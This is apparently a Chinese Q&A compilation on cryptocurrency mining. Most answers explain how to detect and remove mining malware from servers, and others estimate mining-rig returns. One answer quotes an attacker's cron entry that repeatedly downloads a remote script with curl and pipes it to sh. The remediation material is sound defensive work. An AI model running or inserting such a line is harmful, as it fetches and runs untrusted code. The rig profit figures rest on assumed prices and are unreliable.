挖礦阻塞遠程連接
① 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
② 挖礦會被電信公司發現
不確定,中國電信江蘇分公司校園門戶網站(pre.f-young.cn)提供下載的「天翼校園客戶端」被植入後門病毒,該病毒可接受黑客遠程指令,利用中毒電腦刷廣告流量,同時也會釋放「門羅幣」挖礦者病毒進行挖礦。用戶在安裝「天翼校園客戶端」之後,就會在安裝目錄中自動釋放speedtest.dll文件,也就是病毒的本體,所有執行下載、釋放其他病毒模塊等操作都由這個文件進行。廣告刷量模塊被執行後,它會創建一個隱藏的IE窗口,然後開始讀取雲端指令,在後台模擬用戶操作滑鼠、鍵盤點擊刷廣告。為了讓用戶不察覺這一情況,還屏蔽了音效卡播放廣告頁面中的聲音。
另外的病毒挖礦模塊,在分析之後發現所挖的是「門羅幣」,這是一種類似於「比特幣」的數字虛擬貨幣,每杖價格約500元。當病毒模塊開始「挖礦」時,計算機CPU資源佔用量明顯飆升,導致電腦性能變差,發熱量上升,同時電腦風扇也會高速運行,電腦噪音也會隨之增加。最後還發現,一款簽名為「中國電信股份有限公司」農歷日歷(Chinese Calendar)同樣存在該後門病毒。一般來說,像電信這樣大型企業公司的簽名應該不會存在什麼問題,這次被植入病毒確實讓人覺得有些奇怪,但究竟是怎麼被植入的,目前還沒有結果。
比特幣介紹:
一、比特幣的發行和交易的完成是通過挖礦來實現的,它以一個確定的但不斷減慢的速率被鑄造出來。每一個新區塊都伴隨著一定數量從無到有的全新比特幣。境外很多人以挖礦為生,但是在境內是不允許的,目前有關部門對此內容採取嚴打態勢。在家裡利用電腦挖礦,如果沒有大量用電的情況下,一般不會被供電局調查;如果耗電比較嚴重,又或者是有偷電行為,就有可能被供電局調查。到時候就不僅僅是被罰款那麼簡單了,還有可能承擔刑事責任。
二、工業互聯網平台和智能設備成為網路威脅的重要目標。據國家工業信息安全發展研究中心監測,第二季度我國境內共有22個工業互聯網平台提供服務,針對這些工業互聯網平台的、來源於境外的網路攻擊事件共有656起,涉及北京、重慶、湖南、內蒙古等地區;新增工業控制系統漏洞115個,涉及羅克韋爾、西門子、施耐德電氣等品牌的71款產品;我國境內感染工業互聯網智能設備惡意程序的受控IP地址共有52.7萬余個,受控IP地址數量在1萬個以上的僵屍網路共有13個。
③ 關於比特幣礦工的問題! 我一哥哥投資了一百多萬弄了一百台挖礦機,找的人幫忙看著的,每天就是弄個遠程
礦機回本的周期受算力,機子成本,電費,託管費和幣價的影響,其中最主要的影響為幣價,在未來幣價上漲越快,回本周期就越短,以目前市場主流機器,鑫威B3為參考
最新數據 最新鑫威B3超頻比特幣礦機 算力12T 功率2150W
按照0.00228單台每日均值計算 1台一日可以獲得0.00228個比特幣
每日收益:0.00228*50000(取整數計算)=114元
成本:1.電費:2.150*24*0.28*1=14.448元
2.託管費:114*20%=22.8元
凈收益:114-14.448-22.8=76.752元
月收益:76.752*30=2302.56元 月收益率:19.188%
年收益:76.752*365=27630.72 年化收益在230.256%
④ 我的比特幣挖礦機一直是正在連接 請問為什麼
換個礦池試試,看情況應該是你所在的礦池出問題了,而且現在不曉得你機器的算力,現在的計算難度是九億多要是你機器的算力低於20G進不去礦池是很正常的,要是顯卡機器就更正常了,採用我的答案不行的話我可以給你遠程。
⑤ 挖礦病毒怎麼排查
登錄系統查看任務管理器,查看佔用內存較大且無法關閉的進程。進程上點擊滑鼠右鍵,打開文件位置(先要在文件夾選項中選擇顯示隱藏文件及操作系文件)。此時你可能會看到有一個Systmss.exe進程和模仿操作系統的svchost.exe進程這里還可以看到一個2.bat文件,右鍵編輯打開這個文件查看,可查看到惡意進程與哪個挖礦組織通信。
通過查看系統操作日誌可分析出病毒的來源、啟動時間等信息,一般原因可能是未關閉3389埠且使用了弱密碼導致黑客遠程登錄上次病毒。
根除病毒:將病毒可執行文件Systmss.exe重命名為Systmss.exe1使病毒無法執行,此時可從任務管理器停止進程。打開注冊表編輯器刪除HKEY_LOCAL_整個目錄。
如果是Linux系統請參考:網頁鏈接
⑥ 求助伺服器被挖礦程序入侵,如何排查
新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接
伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般
會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這
就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客
戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。
挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,
仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查
當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。
對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病
毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,
客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊
狀況。
通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開
發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重
的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,
SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器
一切穩定運行,網站打開正常。
⑦ 挖礦 沒服務
根據某安全公司安全威脅檢測到在2019年中,惡意軟體攔截量為181.07億次,其中挖礦類惡意軟體感染佔比最多(58%),其次為遠程木馬(佔比14%),企業或組織內文件共享等機制也使得感染型病毒的比例在9%左右。惡意軟體一哥挖礦軟體攻擊勢頭非常猛,加密貨幣挖礦流量較去年增長約100%,在類型上也趨向隱性更好的幣種,隱蔽性更好的無文件挖礦也給企業或組織帶來了嚴峻的考驗。
由於挖礦對計算機的性能要求比較高,老謀深算的礦工就把罪惡的雙手伸向了企業,通過各種手段入侵到各個單位的內網,運行挖礦程序,利用別人的計算資源挖礦,自己坐享其成,的確是高手高手高高手。如何快速地識別內網中是否有挖礦成為了當下網路環境中重要的環節,可以從以下幾個方面快速定位.查看任務管理器計算機一旦執行了挖礦程序,會佔用大量的CPU資源,CPU佔用100%,此時伺服器就會變得異常卡頓。Linux執行top命令查看當前進程負載,可以看到這個watchbog的進程CPU佔用100%,而Linux的正常進程是watchdog,很明顯,這個進程是黑客估計混淆視聽的。2.查看計劃任務&啟動項攻擊者成功入侵後,一般都會設定計劃任務或啟動項,這樣每次重啟機器後都會自動啟動挖礦程序。Windows:從任務管理中可以看到,有一條使用powershell執行的命令,每5分鍾執行一次
PoS(Proof of Stake)挖礦:其實是模仿 PoW 算力挖礦,持幣人可以將 Token(相當於算力挖礦中的算力)抵押給驗證人節點(大多是錢包方,或者交易平台。),來獲得節點獎勵分紅。不同的 Token,由於其機制的不同,獲得的收益可能完全不同,但是,這里並不是收益越高越好,還要考慮代幣的價值,因為代幣抵押後,解鎖也需要花十多天時間(為了降低代幣的流通量)。要知道,在這個行業,一天 Token 價格的波動可能就會抵消掉你的 挖礦獎勵。所以 一定要慎重,選擇出自己非常看好的 Token 才做 ,否則可能得不償失。
⑧ 如何用Linux伺服器挖礦教程
今天早上起來一看,伺服器腳本一個都沒有啟動!甚是奇怪,遠程登錄伺服器,也是異常的卡,直到最後卡死,只好重新啟動伺服器!
啟動之後沒一會又會變卡,越來越卡,top查看進程!不覺又奇怪的進程,因為平常也不經常看!所以自己也搞不明白怎麼回事兒!只好到群里問了問,說是被挖礦的掛了木馬文件了,是由於redis的漏洞!
後來我自己發現,原來redis遠程可以直接登錄,原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢,看來是我想多了
看了好長時間才發現一個異常的進程,自啟的進程 molibe !
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下,打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下,cat root 查看定時器的執行發現之前腳本都被改了,顧不得刪除cron,service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了!但是根本是因為redis漏洞,所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)
⑨ 路由器挖礦,麻煩幫我看一下怎麼弄
確認這個是挖礦嗎?
礦機主要是由高規格的顯卡組合來進行運算挖礦的,跟路由器性能沒多大關系
這個路由器是小米MINI,外加一個自己利用筆記本硬碟組裝的移動硬碟,用途無非就是利用小米自家的路由器系統組件個人的NAS伺服器,遠程查看文件,遠程下載什麼的,和挖礦沒一點關系
之前小米路由器有一個出售自己閑置網速掙錢的路由器插件,但是回本比較慢,沒什麼用
綜合來說,你提供的圖和挖礦沒多大關系